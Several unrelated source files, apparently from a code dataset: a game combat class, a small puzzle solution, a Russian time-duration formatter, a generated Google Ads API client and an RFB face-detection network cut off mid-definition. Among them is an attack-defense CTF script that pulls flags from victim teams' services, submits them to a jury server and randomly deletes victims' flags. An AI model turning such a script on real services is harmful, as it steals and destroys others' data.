self.verify_contract_txs_internal_order_test(with_restart=True, use_staking=True)
self.verify_contract_ancestor_txs_test(with_restart=True, use_staking=True)
if __name__ == '__main__':
QtumTransactionPrioritizationTest().main()
|
the-stack_0_3791 | from app.engine.combat.solver import CombatPhaseSolver
from app.engine import skill_system, item_system
from app.engine.game_state import game
from app.engine.combat.simple_combat import SimpleCombat
from app.engine.objects.unit import UnitObject
from app.engine.objects.item import ItemObject
class BaseCombat(SimpleCombat):
alerts: bool = True
"""
    Handles the "use" of items in base and on the prep screen
"""
def __init__(self, attacker: UnitObject, main_item: ItemObject,
main_target: UnitObject, script):
self.attacker = attacker
self.defender = main_target
self.main_item = main_item
self.def_item = None
if self.defender:
self.def_item = self.defender.get_weapon()
self.state_machine = CombatPhaseSolver(
self.attacker, self.main_item, [self.main_item],
[self.defender], [[]], [self.defender.position],
self.defender, self.def_item, script)
self.full_playback = []
self.playback = []
self.actions = []
self.start_combat()
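        # Run the combat state machine to completion, recording each phase's playback and
        # applying its actions before advancing to the next phase.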
while self.state_machine.get_state():
self.actions, self.playback = self.state_machine.do()
self.full_playback += self.playback
self._apply_actions()
self.state_machine.setup_next_state()
def start_combat(self):
game.events.trigger('combat_start', self.attacker, self.defender, self.main_item, self.attacker.position)
skill_system.pre_combat(self.full_playback, self.attacker, self.main_item, self.defender, 'attack')
if self.attacker is not self.defender:
skill_system.pre_combat(self.full_playback, self.defender, self.def_item, self.attacker, 'defense')
skill_system.start_combat(self.full_playback, self.attacker, self.main_item, self.defender, 'attack')
item_system.start_combat(self.full_playback, self.attacker, self.main_item, self.defender, 'attack')
if self.attacker is not self.defender:
skill_system.start_combat(self.full_playback, self.defender, self.def_item, self.attacker, 'defense')
if self.def_item:
item_system.start_combat(self.full_playback, self.defender, self.def_item, self.attacker, 'defense')
def cleanup_combat(self):
skill_system.cleanup_combat(self.full_playback, self.attacker, self.main_item, self.defender, 'attack')
if self.attacker is not self.defender:
skill_system.cleanup_combat(self.full_playback, self.defender, self.def_item, self.attacker, 'defense')
def end_combat(self):
skill_system.end_combat(self.full_playback, self.attacker, self.main_item, self.defender, 'attack')
item_system.end_combat(self.full_playback, self.attacker, self.main_item, self.defender, 'attack')
if self.attacker is not self.defender:
skill_system.end_combat(self.full_playback, self.defender, self.def_item, self.attacker, 'defense')
if self.def_item:
item_system.end_combat(self.full_playback, self.defender, self.def_item, self.attacker, 'defense')
skill_system.post_combat(self.full_playback, self.attacker, self.main_item, self.defender, 'attack')
if self.attacker is not self.defender:
skill_system.post_combat(self.full_playback, self.defender, self.def_item, self.attacker, 'defense')
def _all_units(self) -> list:
"""
        Returns a list of all units taking part in this combat
"""
all_units = [self.attacker]
if self.attacker is not self.defender:
all_units.append(self.defender)
return all_units
def handle_state_stack(self):
pass
|
the-stack_0_3792 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
def check(S,a,b):
if (a in S) and (b not in S):
return 0
if (b in S) and (a not in S):
return 0
return 1
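# For example, check("SNEW", "N", "S") returns 1 (both of the pair present),
# while check("SEW", "N", "S") returns 0 (exactly one of the pair present).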
def main():
S = str(input())
flag = 1
for a,b in [['N','S'],['E','W']]:
flag = min(check(S,a,b),flag)
if flag==1:
print('Yes')
else:
print('No')
if __name__ == '__main__':
main() |
the-stack_0_3794 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import requests
import socket
import time
import sys
import random
import traceback
def send_flag(your_teamnum, jury_hostport, flag):
global requests
url = 'http://' + jury_hostport + '/flag?teamid=' + str(your_teamnum) + '&flag=' + flag
try:
r = requests.get(url)
print("Try send flag " + flag)
if r.status_code != 200:
print("FAIL")
print(r.text)
else:
print("OK!!!!")
except Exception as ex:
print("Could not connect to jury " + url + str(ex))
except SystemExit:
pass
def delete_flag(ip_address, port, flag_id):
try:
# print("try connect " + host + ":" + str(port))
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(1)
s.connect((ip_address, port))
s.recv(1024)
s.send("delete\n".encode("utf-8"))
s.recv(1024)
s.send((flag_id + "\n").encode("utf-8"))
s.recv(1024)
s.close()
except socket.timeout:
print("Error(1) in delete_flag socket.timeout")
traceback.print_exc()
exit(509)
except socket.error as serr:
print("Error(2) in delete_flag " + str(serr))
traceback.print_exc()
exit(508)
except Exception as e:
print("Error(3) in delete_flag " + str(e))
traceback.print_exc()
exit(507)
return ''
def get_flag(ip_address, port, flag_id):
try:
# print("try connect " + host + ":" + str(port))
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(1)
s.connect((ip_address, port))
s.recv(1024)
s.send("get\n".encode("utf-8"))
s.recv(1024)
s.send((flag_id + "\n").encode("utf-8"))
result = s.recv(1024)
result = result.decode("utf-8", "ignore")
flag2 = result.strip()
flag2 = flag2.split("FOUND FLAG: ")
if len(flag2) == 2:
flag2 = flag2[1]
else:
flag2 = ''
s.close()
return flag2
except socket.timeout:
print("Error(1) in get_flag socket.timeout")
traceback.print_exc()
exit(500)
except socket.error as serr:
print("Error(2) in get_flag " + str(serr))
traceback.print_exc()
exit(501)
except Exception as e:
print("Error(3) in get_flag " + str(e))
traceback.print_exc()
exit(502)
return ''
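# Assumed service dialogue behind get_flag (illustrative only; prompts between reads are elided):
#   -> "get\n"   then   -> "<flag_id>\n"
#   <- "FOUND FLAG: <flag>\n"    (an empty string is returned when no flag is found)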
def start_attack(your_teamnum, jury_hostport, ip_address, port):
print("Start attack to (" + ip_address + ":" + str(port) + ")")
flag_ids = []
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(1)
s.connect((ip_address, port))
s.recv(1024)
s.send("list\n".encode("utf-8"))
result = ""
result1 = s.recv(1024)
result1 = result1.decode("utf-8", "ignore")
while result1.strip() != "":
result1 = s.recv(1024)
result1 = result1.decode("utf-8", "ignore")
if result1.strip() == "":
break
result = result + result1
s.close()
result = result.split('\n')
for i in result:
flag_id = i.split(":")
if len(flag_id) > 1:
flag_id = flag_id[1].strip()
flag_ids.append(flag_id)
except socket.timeout:
print("Socket timeout")
traceback.print_exc()
exit(504)
except socket.error as serr:
print("Error in start_attack: " + str(serr))
traceback.print_exc()
exit(505)
except Exception as e:
print("Error in start_attack: " + str(e))
traceback.print_exc()
exit(506)
for flag_id in flag_ids:
flag = get_flag(ip_address, port, flag_id)
print(flag_id + ": " + flag)
if flag != '':
send_flag(your_teamnum, jury_hostport, flag)
        # randomly remove the flag
n = random.randint(1,100)
if n < 50:
delete_flag(ip_address, port, flag_id)
# flag = str(uuid.uuid4())
# send_flag(your_teamnum, jury_host, jury_port, flag)
jury_hostport = sys.argv[1]
your_teamnum = sys.argv[2]
attack_hosts = sys.argv[3]
attack_hosts = attack_hosts.split(",")
print(attack_hosts)
while(True):
print(" =============== ")
for hostport in attack_hosts:
victum_host = hostport.split(":")[0]
victum_port = int(hostport.split(":")[1])
start_attack(your_teamnum, jury_hostport, victum_host, victum_port)
print(hostport)
t = random.randint(1,60)
print("wait " + str(t) + " sec")
time.sleep(t) # wait t seconds before attack |
the-stack_0_3803 | import warnings
from datetime import timedelta
from string import digits
from typing import Union
CHAR_TO_RU_STR = {'y': ('лет', 'год', 'года'),
'M': ('Месяцев', 'Месяц', 'Месяца'),
'w': ('недель', 'неделя', 'недели'),
'd': ('дней', 'день', 'дня'),
'h': ('часов', 'час', 'часа'),
'm': ('минут', 'минута', 'минуты'),
's': ('секунд', 'секунда', 'секунды')}
CHAR_TO_SEC = {'y': 31536000, 'M': 2592000, 'w': 604800, 'd': 86400, 'h': 3600, 'm': 60, 's': 1,
'г': 31536000, 'л': 31536000, 'М': 2592000, 'н': 604800, 'д': 86400, 'ч': 3600, 'м': 60, 'с': 1}
CHAR_TO_SEC_KEYS = set(CHAR_TO_SEC.keys()) # speeds up parsing when checking keys
STR_TO_SEC = {'years': 31536000, 'months': 2592000, 'weeks': 604800,
'days': 86400, 'hours': 3600, 'minutes': 60, 'seconds': 1}
def _get_times(digit: Union[int, float], tm: str) -> Union[str, None]:
digit = round(digit)
if digit == 0:
return None
tmp = digit % 100
if 11 <= tmp <= 19:
return f"{digit} {CHAR_TO_RU_STR[tm][0]}"
tmp = digit % 10
if tmp == 1:
return f"{digit} {CHAR_TO_RU_STR[tm][1]}"
if 2 <= tmp <= 4:
return f"{digit} {CHAR_TO_RU_STR[tm][2]}"
if tmp == 0 or 5 <= tmp <= 9:
return f"{digit} {CHAR_TO_RU_STR[tm][0]}"
return f"{digit} {CHAR_TO_RU_STR[tm][2]}"
def human_parser(s: str) -> int:
tmp_digit: str = ''
seconds: int = 0
for char in s:
if char in digits:
tmp_digit += char
elif tmp_digit and char in CHAR_TO_SEC_KEYS:
seconds += int(tmp_digit) * CHAR_TO_SEC[char]
tmp_digit = ''
return seconds
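# For example, human_parser("1h 30m") returns 5400, and the Cyrillic unit letters work the same way,
# e.g. human_parser("2д 3ч") returns 183600.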
class Sec2Hum:
__slots__ = ['years', 'months', 'weeks', 'days', 'hours', 'minutes', 'seconds', 'string']
def __init__(self, seconds: Union[int, float, timedelta]):
if isinstance(seconds, int) or isinstance(seconds, float):
seconds = abs(seconds)
elif isinstance(seconds, timedelta):
seconds = seconds.total_seconds()
else:
raise TypeError
if seconds == 0:
self.seconds = 0
self.string = '0 секунд'
else:
for k, v in STR_TO_SEC.items():
self.__setattr__(k, seconds // v)
seconds %= v
self.string = " ".join(filter(None, (_get_times(self.years, 'y'),
_get_times(self.months, 'M'),
_get_times(self.weeks, 'w'),
_get_times(self.days, 'd'),
_get_times(self.hours, 'h'),
_get_times(self.minutes, 'm'),
_get_times(self.seconds, 's'))))
def __str__(self) -> str:
return self.string
def __repr__(self) -> str:
return f"{self.__class__} {self.string}"
class Hum2Sec:
"""
:var self.seconds:
:type self.seconds: int
"""
__seconds: int
__timedelta: timedelta
def __init__(self, string: str):
"""
:param string: time-string to parse.
:type string: str.
"""
self.string = string
self.calculate()
def calculate(self):
if self.string.isdigit():
self.__seconds = int(self.string)
try:
self.__timedelta = timedelta(seconds=self.__seconds)
except OverflowError:
self.__timedelta = timedelta(seconds=999999999)
else:
self.__seconds = human_parser(self.string)
try:
self.__timedelta = timedelta(seconds=self.__seconds)
except OverflowError:
self.__timedelta = timedelta(seconds=999999999)
@property
def seconds(self):
return self.__seconds
@seconds.setter
def seconds(self, value):
raise ValueError
@property
def time_dlt(self):
return self.__timedelta
@time_dlt.setter
def time_dlt(self, value):
raise ValueError
@property
def delta(self):
"""
Deprecated, use time_dlt instead.
:return:
"""
warnings.warn("Hum2Sec.delta deprecated, use Hum2Sec.time_dlt instead.", DeprecationWarning, stacklevel=2)
return self.__timedelta
@delta.setter
def delta(self, value):
raise ValueError
def __str__(self) -> str:
return str(self.__seconds)
def __repr__(self) -> str:
return f"{self.__class__} {self.__seconds}"
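# Illustrative usage (not part of the original module):
#   Sec2Hum(5400).string    -> '1 час 30 минут'
#   Hum2Sec('90m').seconds  -> 5400
#   Hum2Sec('90m').time_dlt -> timedelta(seconds=5400)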
|
the-stack_0_3804 | # -*- coding: utf-8 -*-
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from collections import OrderedDict
import os
import re
from typing import Dict, Optional, Sequence, Tuple, Type, Union
from google.api_core import client_options as client_options_lib
from google.api_core import gapic_v1
from google.api_core import retry as retries
from google.auth import credentials as ga_credentials # type: ignore
from google.auth.transport import mtls # type: ignore
from google.auth.transport.grpc import SslCredentials # type: ignore
from google.auth.exceptions import MutualTLSChannelError # type: ignore
from google.oauth2 import service_account # type: ignore
try:
OptionalRetry = Union[retries.Retry, gapic_v1.method._MethodDefault]
except AttributeError: # pragma: NO COVER
OptionalRetry = Union[retries.Retry, object] # type: ignore
from google.ads.googleads.v9.resources.types import user_interest
from google.ads.googleads.v9.services.types import user_interest_service
from .transports.base import UserInterestServiceTransport, DEFAULT_CLIENT_INFO
from .transports.grpc import UserInterestServiceGrpcTransport
class UserInterestServiceClientMeta(type):
"""Metaclass for the UserInterestService client.
This provides class-level methods for building and retrieving
support objects (e.g. transport) without polluting the client instance
objects.
"""
_transport_registry = (
OrderedDict()
) # type: Dict[str, Type[UserInterestServiceTransport]]
_transport_registry["grpc"] = UserInterestServiceGrpcTransport
def get_transport_class(
cls, label: str = None,
) -> Type[UserInterestServiceTransport]:
"""Return an appropriate transport class.
Args:
label: The name of the desired transport. If none is
provided, then the first transport in the registry is used.
Returns:
The transport class to use.
"""
# If a specific transport is requested, return that one.
if label:
return cls._transport_registry[label]
# No transport is requested; return the default (that is, the first one
# in the dictionary).
return next(iter(cls._transport_registry.values()))
class UserInterestServiceClient(metaclass=UserInterestServiceClientMeta):
"""Service to fetch Google Ads User Interest."""
@staticmethod
def _get_default_mtls_endpoint(api_endpoint):
"""Convert api endpoint to mTLS endpoint.
Convert "*.sandbox.googleapis.com" and "*.googleapis.com" to
"*.mtls.sandbox.googleapis.com" and "*.mtls.googleapis.com" respectively.
Args:
api_endpoint (Optional[str]): the api endpoint to convert.
Returns:
str: converted mTLS api endpoint.
"""
if not api_endpoint:
return api_endpoint
mtls_endpoint_re = re.compile(
r"(?P<name>[^.]+)(?P<mtls>\.mtls)?(?P<sandbox>\.sandbox)?(?P<googledomain>\.googleapis\.com)?"
)
m = mtls_endpoint_re.match(api_endpoint)
name, mtls, sandbox, googledomain = m.groups()
if mtls or not googledomain:
return api_endpoint
if sandbox:
return api_endpoint.replace(
"sandbox.googleapis.com", "mtls.sandbox.googleapis.com"
)
return api_endpoint.replace(".googleapis.com", ".mtls.googleapis.com")
DEFAULT_ENDPOINT = "googleads.googleapis.com"
DEFAULT_MTLS_ENDPOINT = _get_default_mtls_endpoint.__func__( # type: ignore
DEFAULT_ENDPOINT
)
@classmethod
def from_service_account_info(cls, info: dict, *args, **kwargs):
"""Creates an instance of this client using the provided credentials info.
Args:
info (dict): The service account private key info.
args: Additional arguments to pass to the constructor.
kwargs: Additional arguments to pass to the constructor.
Returns:
UserInterestServiceClient: The constructed client.
"""
credentials = service_account.Credentials.from_service_account_info(
info
)
kwargs["credentials"] = credentials
return cls(*args, **kwargs)
@classmethod
def from_service_account_file(cls, filename: str, *args, **kwargs):
"""Creates an instance of this client using the provided credentials
file.
Args:
filename (str): The path to the service account private key json
file.
args: Additional arguments to pass to the constructor.
kwargs: Additional arguments to pass to the constructor.
Returns:
UserInterestServiceClient: The constructed client.
"""
credentials = service_account.Credentials.from_service_account_file(
filename
)
kwargs["credentials"] = credentials
return cls(*args, **kwargs)
from_service_account_json = from_service_account_file
@property
def transport(self) -> UserInterestServiceTransport:
"""Return the transport used by the client instance.
Returns:
UserInterestServiceTransport: The transport used by the client instance.
"""
return self._transport
def __enter__(self):
return self
def __exit__(self, type, value, traceback):
"""Releases underlying transport's resources.
.. warning::
ONLY use as a context manager if the transport is NOT shared
with other clients! Exiting the with block will CLOSE the transport
and may cause errors in other clients!
"""
self.transport.close()
@staticmethod
def user_interest_path(customer_id: str, user_interest_id: str,) -> str:
"""Return a fully-qualified user_interest string."""
return "customers/{customer_id}/userInterests/{user_interest_id}".format(
customer_id=customer_id, user_interest_id=user_interest_id,
)
@staticmethod
def parse_user_interest_path(path: str) -> Dict[str, str]:
"""Parse a user_interest path into its component segments."""
m = re.match(
r"^customers/(?P<customer_id>.+?)/userInterests/(?P<user_interest_id>.+?)$",
path,
)
return m.groupdict() if m else {}
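    # Illustrative round trip (the IDs are made up):
    #   user_interest_path("1234567890", "92948")
    #     -> "customers/1234567890/userInterests/92948"
    #   parse_user_interest_path("customers/1234567890/userInterests/92948")
    #     -> {"customer_id": "1234567890", "user_interest_id": "92948"}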
@staticmethod
def common_billing_account_path(billing_account: str,) -> str:
"""Return a fully-qualified billing_account string."""
return "billingAccounts/{billing_account}".format(
billing_account=billing_account,
)
@staticmethod
def parse_common_billing_account_path(path: str) -> Dict[str, str]:
"""Parse a billing_account path into its component segments."""
m = re.match(r"^billingAccounts/(?P<billing_account>.+?)$", path)
return m.groupdict() if m else {}
@staticmethod
def common_folder_path(folder: str,) -> str:
"""Return a fully-qualified folder string."""
return "folders/{folder}".format(folder=folder,)
@staticmethod
def parse_common_folder_path(path: str) -> Dict[str, str]:
"""Parse a folder path into its component segments."""
m = re.match(r"^folders/(?P<folder>.+?)$", path)
return m.groupdict() if m else {}
@staticmethod
def common_organization_path(organization: str,) -> str:
"""Return a fully-qualified organization string."""
return "organizations/{organization}".format(organization=organization,)
@staticmethod
    def parse_common_organization_path(path: str) -> Dict[str, str]:
        """Parse an organization path into its component segments."""
m = re.match(r"^organizations/(?P<organization>.+?)$", path)
return m.groupdict() if m else {}
@staticmethod
def common_project_path(project: str,) -> str:
"""Return a fully-qualified project string."""
return "projects/{project}".format(project=project,)
@staticmethod
def parse_common_project_path(path: str) -> Dict[str, str]:
"""Parse a project path into its component segments."""
m = re.match(r"^projects/(?P<project>.+?)$", path)
return m.groupdict() if m else {}
@staticmethod
def common_location_path(project: str, location: str,) -> str:
"""Return a fully-qualified location string."""
return "projects/{project}/locations/{location}".format(
project=project, location=location,
)
@staticmethod
def parse_common_location_path(path: str) -> Dict[str, str]:
"""Parse a location path into its component segments."""
m = re.match(
r"^projects/(?P<project>.+?)/locations/(?P<location>.+?)$", path
)
return m.groupdict() if m else {}
def __init__(
self,
*,
credentials: Optional[ga_credentials.Credentials] = None,
transport: Union[str, UserInterestServiceTransport, None] = None,
client_options: Optional[client_options_lib.ClientOptions] = None,
client_info: gapic_v1.client_info.ClientInfo = DEFAULT_CLIENT_INFO,
) -> None:
"""Instantiate the user interest service client.
Args:
credentials (Optional[google.auth.credentials.Credentials]): The
authorization credentials to attach to requests. These
credentials identify the application to the service; if none
are specified, the client will attempt to ascertain the
credentials from the environment.
transport (Union[str, ~.UserInterestServiceTransport]): The
transport to use. If set to None, a transport is chosen
automatically.
client_options (google.api_core.client_options.ClientOptions): Custom options for the
client. It won't take effect if a ``transport`` instance is provided.
(1) The ``api_endpoint`` property can be used to override the
default endpoint provided by the client. GOOGLE_API_USE_MTLS_ENDPOINT
environment variable can also be used to override the endpoint:
"always" (always use the default mTLS endpoint), "never" (always
use the default regular endpoint) and "auto" (auto switch to the
default mTLS endpoint if client certificate is present, this is
the default value). However, the ``api_endpoint`` property takes
precedence if provided.
(2) If GOOGLE_API_USE_CLIENT_CERTIFICATE environment variable
is "true", then the ``client_cert_source`` property can be used
to provide client certificate for mutual TLS transport. If
not provided, the default SSL client certificate will be used if
present. If GOOGLE_API_USE_CLIENT_CERTIFICATE is "false" or not
set, no client certificate will be used.
client_info (google.api_core.gapic_v1.client_info.ClientInfo):
The client info used to send a user-agent string along with
API requests. If ``None``, then default info will be used.
Generally, you only need to set this if you're developing
your own client library.
Raises:
google.auth.exceptions.MutualTLSChannelError: If mutual TLS transport
creation failed for any reason.
"""
if isinstance(client_options, dict):
client_options = client_options_lib.from_dict(client_options)
if client_options is None:
client_options = client_options_lib.ClientOptions()
# Create SSL credentials for mutual TLS if needed.
if os.getenv("GOOGLE_API_USE_CLIENT_CERTIFICATE", "false") not in (
"true",
"false",
):
raise ValueError(
"Environment variable `GOOGLE_API_USE_CLIENT_CERTIFICATE` must be either `true` or `false`"
)
use_client_cert = (
os.getenv("GOOGLE_API_USE_CLIENT_CERTIFICATE", "false") == "true"
)
ssl_credentials = None
is_mtls = False
if use_client_cert:
if client_options.client_cert_source:
import grpc # type: ignore
cert, key = client_options.client_cert_source()
ssl_credentials = grpc.ssl_channel_credentials(
certificate_chain=cert, private_key=key
)
is_mtls = True
else:
creds = SslCredentials()
is_mtls = creds.is_mtls
ssl_credentials = creds.ssl_credentials if is_mtls else None
# Figure out which api endpoint to use.
if client_options.api_endpoint is not None:
api_endpoint = client_options.api_endpoint
else:
use_mtls_env = os.getenv("GOOGLE_API_USE_MTLS_ENDPOINT", "auto")
if use_mtls_env == "never":
api_endpoint = self.DEFAULT_ENDPOINT
elif use_mtls_env == "always":
api_endpoint = self.DEFAULT_MTLS_ENDPOINT
elif use_mtls_env == "auto":
api_endpoint = (
self.DEFAULT_MTLS_ENDPOINT
if is_mtls
else self.DEFAULT_ENDPOINT
)
else:
raise MutualTLSChannelError(
"Unsupported GOOGLE_API_USE_MTLS_ENDPOINT value. Accepted values: never, auto, always"
)
# Save or instantiate the transport.
# Ordinarily, we provide the transport, but allowing a custom transport
# instance provides an extensibility point for unusual situations.
if isinstance(transport, UserInterestServiceTransport):
# transport is a UserInterestServiceTransport instance.
if credentials:
raise ValueError(
"When providing a transport instance, "
"provide its credentials directly."
)
self._transport = transport
elif isinstance(transport, str):
Transport = type(self).get_transport_class(transport)
self._transport = Transport(
credentials=credentials, host=self.DEFAULT_ENDPOINT
)
else:
self._transport = UserInterestServiceGrpcTransport(
credentials=credentials,
host=api_endpoint,
ssl_channel_credentials=ssl_credentials,
client_info=client_info,
)
def get_user_interest(
self,
request: Union[
user_interest_service.GetUserInterestRequest, dict
] = None,
*,
resource_name: str = None,
retry: OptionalRetry = gapic_v1.method.DEFAULT,
timeout: float = None,
metadata: Sequence[Tuple[str, str]] = (),
) -> user_interest.UserInterest:
r"""Returns the requested user interest in full detail
List of thrown errors: `AuthenticationError <>`__
`AuthorizationError <>`__ `HeaderError <>`__
`InternalError <>`__ `QuotaError <>`__ `RequestError <>`__
Args:
request (Union[google.ads.googleads.v9.services.types.GetUserInterestRequest, dict]):
The request object. Request message for
[UserInterestService.GetUserInterest][google.ads.googleads.v9.services.UserInterestService.GetUserInterest].
resource_name (:class:`str`):
Required. Resource name of the
UserInterest to fetch.
This corresponds to the ``resource_name`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.ads.googleads.v9.resources.types.UserInterest:
A user interest: a particular
interest-based vertical to be targeted.
"""
# Create or coerce a protobuf request object.
# Sanity check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
if request is not None and any([resource_name]):
raise ValueError(
"If the `request` argument is set, then none of "
"the individual field arguments should be set."
)
# Minor optimization to avoid making a copy if the user passes
# in a user_interest_service.GetUserInterestRequest.
# There's no risk of modifying the input as we've already verified
# there are no flattened fields.
if not isinstance(
request, user_interest_service.GetUserInterestRequest
):
request = user_interest_service.GetUserInterestRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if resource_name is not None:
request.resource_name = resource_name
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = self._transport._wrapped_methods[
self._transport.get_user_interest
]
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata(
(("resource_name", request.resource_name),)
),
)
# Send the request.
response = rpc(
request, retry=retry, timeout=timeout, metadata=metadata,
)
# Done; return the response.
return response
__all__ = ("UserInterestServiceClient",)
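# Illustrative usage sketch (the IDs below are placeholders and credential handling is elided;
# this is not part of the generated client):
#   client = UserInterestServiceClient(credentials=my_credentials)
#   resource_name = client.user_interest_path("1234567890", "92948")
#   user_interest = client.get_user_interest(resource_name=resource_name)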
|
the-stack_0_3806 | import torch
import torch.nn as nn
import torch.nn.functional as F
from torch.nn import Conv2d, Sequential, ModuleList, ReLU
from src.ssd import SSD
from src import rfb_config
from src import config
rfb_config.define_img_size(config.NETWORK_INPUT_SIZE)
class BasicConv(nn.Module):
def __init__(self, in_planes, out_planes, kernel_size, stride=1,
padding=0, dilation=1, groups=1, relu=True, bn=True):
super(BasicConv, self).__init__()
self.out_channels = out_planes
if bn:
self.conv = nn.Conv2d(in_planes, out_planes, kernel_size=kernel_size, stride=stride,
padding=padding, dilation=dilation, groups=groups, bias=False)
self.bn = nn.BatchNorm2d(out_planes, eps=1e-5, momentum=0.01, affine=True)
self.relu = nn.ReLU(inplace=True) if relu else None
else:
self.conv = nn.Conv2d(in_planes, out_planes, kernel_size=kernel_size, stride=stride,
padding=padding, dilation=dilation, groups=groups, bias=True)
self.bn = None
self.relu = nn.ReLU(inplace=True) if relu else None
def forward(self, x):
x = self.conv(x)
if self.bn is not None:
x = self.bn(x)
if self.relu is not None:
x = self.relu(x)
return x
class BasicRFB(nn.Module):
def __init__(self, in_planes, out_planes, stride=1, scale=0.1, map_reduce=8, vision=1, groups=1):
super(BasicRFB, self).__init__()
self.scale = scale
self.out_channels = out_planes
inter_planes = in_planes // map_reduce
self.branch0 = nn.Sequential(
BasicConv(in_planes, inter_planes, kernel_size=1, stride=1, groups=groups, relu=False),
BasicConv(inter_planes, 2 * inter_planes, kernel_size=(3, 3),
stride=stride, padding=(1, 1), groups=groups),
BasicConv(2 * inter_planes, 2 * inter_planes, kernel_size=3, stride=1,
padding=vision + 1, dilation=vision + 1, relu=False, groups=groups)
)
self.branch1 = nn.Sequential(
BasicConv(in_planes, inter_planes, kernel_size=1, stride=1, groups=groups, relu=False),
BasicConv(inter_planes, 2 * inter_planes, kernel_size=(3, 3),
stride=stride, padding=(1, 1), groups=groups),
BasicConv(2 * inter_planes, 2 * inter_planes, kernel_size=3, stride=1,
padding=vision + 2, dilation=vision + 2, relu=False, groups=groups)
)
self.branch2 = nn.Sequential(
BasicConv(in_planes, inter_planes, kernel_size=1, stride=1, groups=groups, relu=False),
BasicConv(inter_planes, (inter_planes // 2) * 3, kernel_size=3,
stride=1, padding=1, groups=groups),
BasicConv((inter_planes // 2) * 3, 2 * inter_planes, kernel_size=3,
stride=stride, padding=1, groups=groups),
BasicConv(2 * inter_planes, 2 * inter_planes, kernel_size=3, stride=1,
padding=vision + 4, dilation=vision + 4, relu=False, groups=groups)
)
self.ConvLinear = BasicConv(6 * inter_planes, out_planes, kernel_size=1, stride=1, relu=False)
self.shortcut = BasicConv(in_planes, out_planes, kernel_size=1, stride=stride, relu=False)
self.relu = nn.ReLU(inplace=False)
def forward(self, x):
x0 = self.branch0(x)
x1 = self.branch1(x)
x2 = self.branch2(x)
out = torch.cat((x0, x1, x2), 1)
out = self.ConvLinear(out)
short = self.shortcut(x)
out = out * self.scale + short
out = self.relu(out)
return out
class RFB(nn.Module):
def __init__(self, num_classes=2, reduced=False):
super(RFB, self).__init__()
self.base_channel = 8 * 2
def conv_bn(inp, oup, stride):
return nn.Sequential(
nn.Conv2d(inp, oup, 3, stride, 1, bias=False),
nn.BatchNorm2d(oup),
nn.ReLU(inplace=True))
def conv_dw(inp, oup, stride):
return nn.Sequential(
nn.Conv2d(inp, inp, 3, stride, 1, groups=inp, bias=False),
nn.BatchNorm2d(inp),
nn.ReLU(inplace=True),
nn.Conv2d(inp, oup, 1, 1, 0, bias=False),
nn.BatchNorm2d(oup),
nn.ReLU(inplace=True))
self.model = nn.Sequential(
conv_bn(3, self.base_channel, 2), # 160*120
conv_dw(self.base_channel, self.base_channel * 2, 1),
conv_dw(self.base_channel * 2, self.base_channel * 2, 2), # 80*60
conv_dw(self.base_channel * 2, self.base_channel * 2, 1),
conv_dw(self.base_channel * 2, self.base_channel * 4, 2), # 40*30
conv_dw(self.base_channel * 4, self.base_channel * 4, 1),
conv_dw(self.base_channel * 4, self.base_channel * 4, 1),
conv_dw(self.base_channel * 4, self.base_channel * 4, 1) if reduced else BasicRFB(self.base_channel * 4, self.base_channel * 4, stride=1, scale=1.0),
conv_dw(self.base_channel * 4, self.base_channel * 8, 2), # 20*15
conv_dw(self.base_channel * 8, self.base_channel * 8, 1),
conv_dw(self.base_channel * 8, self.base_channel * 8, 1),
conv_dw(self.base_channel * 8, self.base_channel * 16, 2), # 10*8
conv_dw(self.base_channel * 16, self.base_channel * 16, 1)
)
self.fc = nn.Linear(1024, num_classes)
def forward(self, x):
x = self.model(x)
x = F.avg_pool2d(x, 7)
x = x.view(-1, 1024)
x = self.fc(x)
return x
def deepPointwiseConv2d(in_channels, out_channels, kernel_size=1, stride=1, padding=0):
"""Replace Conv2d with a depthwise Conv2d and Pointwise Conv2d."""
return Sequential(
Conv2d(in_channels=in_channels, out_channels=in_channels, kernel_size=kernel_size,
groups=in_channels, stride=stride, padding=padding),
ReLU(),
Conv2d(in_channels=in_channels, out_channels=out_channels, kernel_size=1))
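# Rough parameter count for this depthwise-separable factorization with a 3x3 kernel and
# 64 -> 64 channels (biases ignored): a plain Conv2d needs 64*64*3*3 = 36864 weights,
# while depthwise + pointwise needs 64*3*3 + 64*64 = 4672.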
def create_net(num_classes, is_test=False, device="cuda", reduced=False):
base_net = RFB(2, reduced=reduced)
base_net_model = base_net.model # disable dropout layer
source_layer_indexes = [8, 11, 13]
extras = ModuleList([
Sequential(
Conv2d(in_channels=base_net.base_channel * 16, out_channels=base_net.base_channel * 4, kernel_size=1),
ReLU(),
deepPointwiseConv2d(in_channels=base_net.base_channel * 4,
out_channels=base_net.base_channel * 16, kernel_size=3, stride=2, padding=1),
ReLU()
)
])
regression_headers = ModuleList([
deepPointwiseConv2d(in_channels=base_net.base_channel * 4, out_channels=3 * 4, kernel_size=3, padding=1),
deepPointwiseConv2d(in_channels=base_net.base_channel * 8, out_channels=2 * 4, kernel_size=3, padding=1),
deepPointwiseConv2d(in_channels=base_net.base_channel * 16, out_channels=2 * 4, kernel_size=3, padding=1),
Conv2d(in_channels=base_net.base_channel * 16, out_channels=3 * 4, kernel_size=3, padding=1)
])
classification_headers = ModuleList([
deepPointwiseConv2d(in_channels=base_net.base_channel * 4, out_channels=3 * num_classes, kernel_size=3, padding=1),
